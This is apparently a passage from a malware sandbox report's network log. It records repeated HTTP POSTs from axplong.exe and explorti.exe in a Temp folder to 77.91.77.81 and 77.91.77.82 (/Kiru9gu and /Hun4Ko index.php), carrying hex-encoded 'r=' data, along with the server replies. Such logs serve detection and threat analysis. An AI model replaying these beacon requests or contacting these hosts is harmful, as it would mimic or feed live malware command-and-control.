                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:00.246685982 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:00.466784000 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:00 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        95192.168.2.64993777.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:59.939588070 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:00.640341997 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:00 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:00.641138077 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:00.946795940 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:00 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        96192.168.2.64993877.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:00.577624083 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:01.271883965 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:01.272738934 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:01.494556904 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        97192.168.2.64993977.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:01.063107014 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:01.790431023 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:01.791335106 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:02.020514011 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        98192.168.2.64994077.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:01.613244057 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:02.401887894 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:02.410572052 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:02.638084888 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        99192.168.2.64994177.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:02.128415108 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:02.930632114 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:02.931808949 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:03.160573959 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        100192.168.2.64994277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:02.783226013 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:03.545078993 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:03.545847893 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:03.773035049 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        101192.168.2.64994377.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:03.287223101 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:03.996045113 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:04.006146908 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:04.234894037 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:04 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        102192.168.2.64994477.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:03.885638952 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:04.663932085 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:04 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:04.665328026 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:04.891581059 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:04 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        103192.168.2.64994577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:04.356519938 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:05.064919949 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:04 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        104192.168.2.64994677.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:05.019237995 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:05.730699062 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:05.734582901 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:05.964432955 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        105192.168.2.64994777.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:05.075664043 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:05.824527979 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        106192.168.2.64994877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:05.954607010 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
